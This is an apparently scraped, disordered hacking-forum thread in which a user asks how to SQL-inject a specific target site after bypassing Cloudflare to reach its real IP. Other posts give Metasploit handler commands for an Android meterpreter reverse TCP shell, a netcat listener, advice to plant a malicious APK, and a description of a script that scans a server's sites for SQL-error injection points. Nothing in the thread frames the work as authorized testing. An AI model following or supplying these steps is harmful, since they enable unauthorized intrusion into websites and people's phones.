0o0michael0o0

i had that problem before . i bypassed the cloudflare and i get the true ip adress for the target now what to do next to inject the target site with sql for example ?!!

use multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST xx.xx.xx.xx set LPORT 24000 exploit -j make sure that u have the port 24000 open on your router and link it to ur internal ip address type in terminal nc -lvp 24000 and check if ur port is open throw this site http://www.canyouseeme.org/ if u get a connection from this site that means that all is good with u that shall work fine and if u want to use a dynamic dns https://community.rapid7.com/thread/4676

use burpsuit and check the post data , who knows may be u can inject the post data

thnx digip , actually the site is very well protected and i tried to enumrate the dns with more than methoud but i got a question , if i get the real ip of the server , how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site , i can do it like that http://127.0.0.0/~/user/etc but what if i did`nt get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance

there is a payload in metasploit make apk and hack the android android/meterpreter/reverse_tcp

yeah sure i just thought it might be useful to share with you that script couse it works fine with me .

yeah sure i know but i did`nt hack the server , i`m just trying to explain my point :) i will try to refine it , and plz u can edit my comments with the site and delete it for me :) thnx

i know its not perfect , the script is simply searching for sql error for ex ruby mick.rb 127.0.0.1 id u will get that result

nooo ok try that i know that this server is vurnable to sql and u will understand what i mean :) ruby mick.rb 127.0.0.1 id

the script is simply go to bing.com and write in the search ip:127.0.0.1 so it extract the server sites by that methoud then it looks for sql error for example .php?id=1 ' it puts the ' for all the id found in the server and if it found any error will tell u that the site is vurnabel :)

sorry guys i deleted the script to refine it

i`m asking couse i had that problem before and i wonder is there a method to make the sql injection while the cloudflare is on

i wonder is there any method to make sql injection while cloudflare firewall protecting the server !! ? how to bypass it ? thnx in advance.